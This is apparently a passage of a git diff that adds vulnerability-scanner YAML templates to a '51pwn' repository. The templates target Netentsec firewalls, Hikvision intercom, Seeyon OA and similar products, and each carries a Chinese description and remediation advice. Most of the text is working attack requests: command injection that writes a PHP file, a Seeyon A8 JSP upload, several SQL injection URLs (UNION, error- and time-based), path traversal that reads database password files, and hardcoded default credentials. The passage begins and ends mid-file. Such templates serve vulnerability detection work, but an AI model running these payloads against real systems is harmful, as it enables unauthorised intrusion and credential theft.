1、去除返回包中涉及的敏感信息 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + part: header + words: + - application/json + - type: word + condition: and + part: body + words: + - password + - nsfocus_uts + - MANAGER_IP + matchers-condition: and + path: + - '{{BaseURL}}/webapi/v1/system/accountmanage/account' + method: GET + headers: + Content-Type: application/json diff --git "a/config/51pwn/yaml/\347\275\221\345\272\267\344\270\213\344\270\200\344\273\243\351\230\262\347\201\253\345\242\231/Netentsec-Ngfw-Rce.yaml" "b/config/51pwn/yaml/\347\275\221\345\272\267\344\270\213\344\270\200\344\273\243\351\230\262\347\201\253\345\242\231/Netentsec-Ngfw-Rce.yaml" new file mode 100755 index 000000000..e11479b05 --- /dev/null +++ "b/config/51pwn/yaml/\347\275\221\345\272\267\344\270\213\344\270\200\344\273\243\351\230\262\347\201\253\345\242\231/Netentsec-Ngfw-Rce.yaml" @@ -0,0 +1,48 @@ +id: Netentsec-Ngfw-Rce +info: + name: 网康下一代防火墙_任意命令执行漏洞 + author: + - l0ne1y + tags: + - netentsec + - rce + description: |- + 网康下一代防火墙任意命令执行漏洞 + 北京网康科技有限公司下一代防火墙NS-NGFW是一款可全面应对网络威胁的高性能应用层防火墙。 + + 北京网康科技有限公司下一代防火墙NS-NGFW存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。 + reference: + - https://mp.weixin.qq.com/s/wh5lulise_g381w2ssv93g + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:https://www.netentsec.com/product/lists_265.html +requests: +- matchers: + - type: word + condition: and + words: + - SSLVPN_Resource + - '"result":{"success":true}' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/directdata/direct/router' + method: POST + body: '{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;echo + '''' >/var/www/html/xASDasda.php"]}],"type":"rpc","tid":17}' +- matchers: + - type: word + words: + - '{{randstr}}' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/xASDasda.php' + method: GET + body: '{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;echo + '''' >/var/www/html/xASDasda.php"]}],"type":"rpc","tid":17}' diff --git "a/config/51pwn/yaml/\347\275\221\345\272\267\344\272\222\350\201\224\347\275\221\346\216\247\345\210\266\347\275\221\345\205\263ns-icg/CNVD-2016-08603.yaml" "b/config/51pwn/yaml/\347\275\221\345\272\267\344\272\222\350\201\224\347\275\221\346\216\247\345\210\266\347\275\221\345\205\263ns-icg/CNVD-2016-08603.yaml" new file mode 100755 index 000000000..69c6a0b71 --- /dev/null +++ "b/config/51pwn/yaml/\347\275\221\345\272\267\344\272\222\350\201\224\347\275\221\346\216\247\345\210\266\347\275\221\345\205\263ns-icg/CNVD-2016-08603.yaml" @@ -0,0 +1,36 @@ +id: CNVD-2016-08603 +info: + name: 北京网康科技有限公司网康互联网控制网关ns-icg存在弱口令漏洞 + author: + - l0ne1y + tags: + - natshell + - rce + description: |- + 网康互联网控制网关ns-icg存在默认口令漏洞 + 京网康科技有限公司网康互联网控制网关是一款软硬件一体化互联网控制管理产品。 + + 北京网康科技有限公司网康互联网控制网关ns-icg存在默认账户ns25000/ns25000,允许攻击者利用该漏洞成功登录系统,获取敏感信息。 + reference: + - https://www.cnvd.org.cn/flaw/show/cnvd-2016-08603 + severity: critical + remediation: |- + 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。 + 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 + 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 + 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) + 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) +requests: +- matchers: + - type: word + words: + - '"agreed":true' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/user/login/checkPermit' + method: POST + body: | + usrname=ns25000&pass=ns25000 diff --git "a/config/51pwn/yaml/\347\276\244\347\273\204\345\257\271\350\256\262\346\234\215\345\212\241\351\205\215\347\275\256\345\271\263\345\217\260/HikvisionIntercom-Service-DefaultPassword.yaml" "b/config/51pwn/yaml/\347\276\244\347\273\204\345\257\271\350\256\262\346\234\215\345\212\241\351\205\215\347\275\256\345\271\263\345\217\260/HikvisionIntercom-Service-DefaultPassword.yaml" new file mode 100755 index 000000000..551ecc92f --- /dev/null +++ "b/config/51pwn/yaml/\347\276\244\347\273\204\345\257\271\350\256\262\346\234\215\345\212\241\351\205\215\347\275\256\345\271\263\345\217\260/HikvisionIntercom-Service-DefaultPassword.yaml" @@ -0,0 +1,40 @@ +id: HikvisionIntercom-Service-DefaultPassword +info: + name: hikvision-intercom-service-default-password + author: + - l0ne1y + description: |- + 海康威视群组对讲服务配置平台弱口令漏洞 + 杭州海康威视系统技术有限公司是以视频为核心的智慧物联解决方案供应商和运营服务商。 + + 杭州海康威视系统技术有限公司群组对讲服务配置平台存在弱口令漏洞,攻击者可利用该漏洞获取敏感信息。 + severity: medium + remediation: |- + 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。 + 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 + 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 + 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) + 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) +requests: +- matchers: + - type: word + part: body + words: + - document.title = LOGIN_BTN_LOGIN + - type: status + status: + - 200 + matchers-condition: and + method: GET +- matchers: + - type: status + status: + - 200 + - type: word + words: + - '{"success": true, "msg": "OK"}' + matchers-condition: and + path: + - '{{BaseURL}}/authorize.action' + method: POST + body: username=admin&userpsw=827ccb0eea8a706c4c34a16891f84e7b&language=zh_cn diff --git "a/config/51pwn/yaml/\350\207\264\350\277\234OA/CNVD-2019-19299.yaml" "b/config/51pwn/yaml/\350\207\264\350\277\234OA/CNVD-2019-19299.yaml" new file mode 100755 index 000000000..77c634848 --- /dev/null +++ "b/config/51pwn/yaml/\350\207\264\350\277\234OA/CNVD-2019-19299.yaml" @@ -0,0 +1,60 @@ +id: CNVD-2019-19299 +info: + name: Seeyon A8 - Remote Code Execution + author: + - l0ne1y + description: |- + 致远A8任意文件上传导致RCE + 攻击者利用该漏洞,可在未授权的情况下,远程发送精心构造的网站后门文件,从而获取目标服务器权限,在目标服务器上执行任意代码。 + severity: high + remediation: |- + #### 官方修复方案 + 致远公司已发布补丁完成修复,并成立专项小组,对涉及以上版本的用户进行排查。补丁和更新信息获取方式如下: + 1. 登录致远互联服务网站(http://support.seeyon.com)获取补丁; + 2. 关注“致远互联微服务”公众号,及时获取安全更新通知; + 3. 如有技术问题可联系致远公司,Email:security@seeyon.com,电话:400-700-8822。 + + + #### 临时修补方案如下: + 1. 配置URL访问控制策略; + 2. 在公网部署的致远A8+服务器,通过ACL禁止外网对“/seeyon/htmlofficeservlet”路径的访问; + 3. 对OA服务器上的网站后门文件进行及时查杀。 + + 建议使用致远OA-A8系统的信息系统运营者进行自查,发现存在漏洞后,按照以上方案及时修复。 + 另,致远OA在部分企事业单位的内网办公系统应用也较为广泛,建议及时进行自查和修复。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_2 == 200 + - contains(body_1, "htmoffice operate") + - contains(body_2, "{{randomValue}}") + raw: + - | + POST /seeyon/htmlofficeservlet HTTP/1.1 + Host: {{Hostname}} + Pragma: no-cache + Cache-Control: no-cache + Upgrade-Insecure-Requests: 1 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3 + Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 + Connection: close + + DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV + OPTION=S3WYOSWLBSGr + currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66 + = WUghPB3szB3Xwg66 the CREATEDATE + recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6 + originalFileId = wV66 + originalCreateDate = wUghPB3szB3Xwg66 + FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs + needReadFile = yRWZdAS6 + originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4 + <%out.print({{randomValue}});%> + - | + GET /seeyon/test123456.jsp HTTP/1.1 + Host: {{Hostname}} + req-condition: true +variables: + randomValue: '{{rand_int(200000000, 210000000)}}' diff --git "a/config/51pwn/yaml/\350\207\264\350\277\234OA/CNVD-2020-62422.yaml" "b/config/51pwn/yaml/\350\207\264\350\277\234OA/CNVD-2020-62422.yaml" new file mode 100755 index 000000000..0ff3ed1b8 --- /dev/null +++ "b/config/51pwn/yaml/\350\207\264\350\277\234OA/CNVD-2020-62422.yaml" @@ -0,0 +1,33 @@ +id: CNVD-2020-62422 +info: + name: 致远OA webmail.do任意文件下载 + author: + - l0ne1y + description: |- + 致远OA webmail.do任意文件下载 + 致远OA存在任意文件下载漏洞,任意文件下载漏洞不同于网站目录浏览,此漏洞不仅仅可遍历系统下web中的文件,而且可以浏览或者下载到系统中的文件,攻击人员通过目录遍历攻击可以获取系统文件及服务器的配置文件等等。一般来说,攻击者利用服务器API、文件标准权限进行攻击。任意文件读取/下载漏洞可能存在于Web服务器软件本身,也可能存在于Web应用程序之中。 + severity: medium + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁 + [http://service.seeyon.com/patchtools/tp.html#/patchList?type=%E5%AE%89%E5%85%A8%E8%A1%A5%E4%B8%81&id=64](http://service.seeyon.com/patchtools/tp.html#/patchList?type=%E5%AE%89%E5%85%A8%E8%A1%A5%E4%B8%81&id=64) + [http://service.seeyon.com/patchtools/tp.html#/patchList?type=%E5%AE%89%E5%85%A8%E8%A1%A5%E4%B8%81&id=65](http://service.seeyon.com/patchtools/tp.html#/patchList?type=%E5%AE%89%E5%85%A8%E8%A1%A5%E4%B8%81&id=65) +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + part: header + words: + - application/x-msdownload + - type: word + condition: and + part: body + words: + - ctpDataSource.password + matchers-condition: and + path: + - '{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties' + method: GET diff --git "a/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2010-0105709.yaml" "b/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2010-0105709.yaml" new file mode 100755 index 000000000..fa6e0cbb9 --- /dev/null +++ "b/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2010-0105709.yaml" @@ -0,0 +1,40 @@ +id: wooyun-2010-0105709 +info: + name: 致远oa /yyoa/ext/trafaxserver/New/newInfo.jsp SQL注入漏洞 + author: + - 折跃 + description: |- + 用友致远A6 newInfo.jsp SQL注入漏洞 + 用友致远A6协同管理系统是一个基于互联网的高效协同工作平台和优秀的协同管理系统。 + + 用友致远A6存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.seeyon.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'~~~202cb962ac59075b964b07152d234b70~~~') + path: + - '{{BaseURL}}/yyoa/ext/trafaxserver/New/newInfo.jsp?fax_id=wy%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7e7e7e%2Cmd5%28123%29%2C0x7e7e7e%29%2CNULL%2CNULL--%20-' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2010-0110312.yaml" "b/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2010-0110312.yaml" new file mode 100755 index 000000000..ddb889500 --- /dev/null +++ "b/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2010-0110312.yaml" @@ -0,0 +1,41 @@ +id: wooyun-2010-0110312 +info: + name: 用友致远A6协同系统_SQL注入 + author: + - 折跃 + description: |- + 用友致远A6 isNotInTable.jsp SQL注入漏洞 + 用友致远A6协同管理系统是一个基于互联网的高效协同工作平台和优秀的协同管理系统。 + + 用友致远A6存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.seeyon.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,verify) + - '!contains(body,''select'')' + path: + - '{{BaseURL}}/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=(17)%20union%20all%20select%20{{verify}}#' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0100472.yaml" "b/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0100472.yaml" new file mode 100755 index 000000000..eca7d8e3e --- /dev/null +++ "b/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0100472.yaml" @@ -0,0 +1,37 @@ +id: wooyun-2015-0100472 +info: + name: 致远OA A6 /yyoa/ext/trafaxserver/SystemManage/config.jsp 敏感信息泄露 + author: + - 折跃 + description: |- + 用友致远A6 数据库配置信息泄露 + 用友致远A6协同管理系统是一个基于互联网的高效协同工作平台和优秀的协同管理系统。 + + 用友致远A6存在敏感信息泄露漏洞,攻击者可构造payload,获取敏感信息。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.seeyon.com/ + + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'faxServerDbPassword') + - contains(body,'faxServerPassword') + - contains(body,'faxServerUserName') + path: + - '{{BaseURL}}/yyoa/ext/trafaxserver/SystemManage/config.jsp' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0105502.yaml" "b/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0105502.yaml" new file mode 100755 index 000000000..97d31893f --- /dev/null +++ "b/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0105502.yaml" @@ -0,0 +1,37 @@ +id: wooyun-2015-0105502 +info: + name: 用友致远A6多处未授权访问 + author: + - 折跃 + description: |- + 用友致远A6 多处未授权访问漏洞 + 用友致远A6协同管理系统是一个基于互联网的高效协同工作平台和优秀的协同管理系统。 + + 用友致远A6存在未授权访问漏洞,该漏洞源于网络系统或产品未正确限制来自未授权角色的资源访问,进而造成信息泄露问题。 + severity: medium + remediation: |- + 官方修复方案:: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.seeyon.com/ + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、去除页面中涉及的敏感信息或删除泄露信息页面 + 4、将敏感信息进行加密存储,非必要不可发送前端 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'insertObject') || contains(body,'new personList') || contains(body,'FTP') + path: + - '{{BaseURL}}/yyoa/common/SelectPerson/reloadData.jsp' + - '{{BaseURL}}//yyoa/assess/js/initDataAssess.jsp' + - '{{BaseURL}}/yyoa/ext/trafaxserver/SystemManage/config.jsp' + - '{{BaseURL}}/yyoa/common/selectPersonNew/initData.jsp?trueName=1' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0105709.yaml" "b/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0105709.yaml" new file mode 100755 index 000000000..7f05d86e8 --- /dev/null +++ "b/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0105709.yaml" @@ -0,0 +1,40 @@ +id: wooyun-2015-0105709 +info: + name: 用友致远A6多处注入 + author: + - 折跃 + description: |- + 用友致远A6 多处SQL注入漏洞 + 用友致远A6协同管理系统是一个基于互联网的高效协同工作平台和优秀的协同管理系统。 + + 用友致远A6存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.seeyon.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 || status_code==500 + - contains(body,'81dc9bdb52d04dc20036dbd8313ed055') + path: + - '{{BaseURL}}/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2%27%20and%20(select%201%20from%20(select%20count(*),concat(md5(1234),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23' + - '{{BaseURL}}/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=-1''%20union%20all%20select%20NULL,md5(1234),NULL,NULL%23' + - '{{BaseURL}}/yyoa/ext/trafaxserver/SendFax/resend.jsp?fax_ids=(1)%20and%201=2%20union%20select%20md5(1234)%20--' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0106478.yaml" "b/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0106478.yaml" new file mode 100755 index 000000000..d972ed8cb --- /dev/null +++ "b/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0106478.yaml" @@ -0,0 +1,38 @@ +id: wooyun-2015-0106478 +info: + name: 用友致远A6_SQL_Injection + author: + - 折跃 + description: |- + 用友致远A6 setextno.jsp SQL注入漏洞 + 用友致远A6协同管理系统是一个基于互联网的高效协同工作平台和优秀的协同管理系统。 + + 用友致远A6存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.seeyon.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'202cb962ac59075b964b07152d234b70') + path: + - '{{BaseURL}}/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20union%20select%201,2,md5(123),1%23' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0107543.yaml" "b/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0107543.yaml" new file mode 100755 index 000000000..14634f892 --- /dev/null +++ "b/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0107543.yaml" @@ -0,0 +1,39 @@ +id: wooyun-2015-0107543 +info: + name: 用友致远A6_initData.jsp_SQL注入 + author: + - 折跃 + description: |- + 用友致远A6 initData.jsp SQL注入漏洞 + 用友致远A6协同管理系统是一个基于互联网的高效协同工作平台和优秀的协同管理系统。 + + 用友致远A6存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.seeyon.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - (duration_2 - duration_1) >= 5 + path: + - '{{BaseURL}}/yyoa/common/selectPersonNew/initData.jsp?trueName=1' + - '{{BaseURL}}/yyoa/common/selectPersonNew/initData.jsp?trueName=1%25%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28sleep%285%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C1%29%29%3E64%20AND%20%27%25%27%3D%27' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0108235.yaml" "b/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0108235.yaml" new file mode 100755 index 000000000..56ee531db --- /dev/null +++ "b/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0108235.yaml" @@ -0,0 +1,38 @@ +id: wooyun-2015-0108235 +info: + name: 用友致远A6 downloadAtt.jsp sql注入 + author: + - 折跃 + description: |- + 用友致远A6 downloadAtt.jsp SQL注入漏洞 + 用友致远A6协同管理系统是一个基于互联网的高效协同工作平台和优秀的协同管理系统。 + + 用友致远A6存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.seeyon.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'202cb962ac59075b964b07152d234b70') + path: + - '{{BaseURL}}/yyoa/ext/trafaxserver/downloadAtt.jsp?attach_ids=(1)%20and%201=2%20union%20select%201,2,3,4,5,md5(123),7--' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0110538.yaml" "b/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0110538.yaml" new file mode 100755 index 000000000..fc396d8ad --- /dev/null +++ "b/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0110538.yaml" @@ -0,0 +1,40 @@ +id: wooyun-2015-0110538 +info: + name: 用友致远A6 多处敏感信息泄露 + author: + - 折跃 + description: |- + 用友致远A6 多处敏感信息泄露漏洞 + 用友致远A6协同管理系统是一个基于互联网的高效协同工作平台和优秀的协同管理系统。 + + 用友致远A6存在敏感信息泄露漏洞,攻击者可构造payload,获取敏感信息。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.seeyon.com/ + + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: or + dsl: + - status_code_1==200 && contains(body_1,'personList') && contains(body_1,'new + Person') + - status_code_2==200 && contains(body_2,'localhost') && contains(body_2,'root') + - status_code_3==200 && 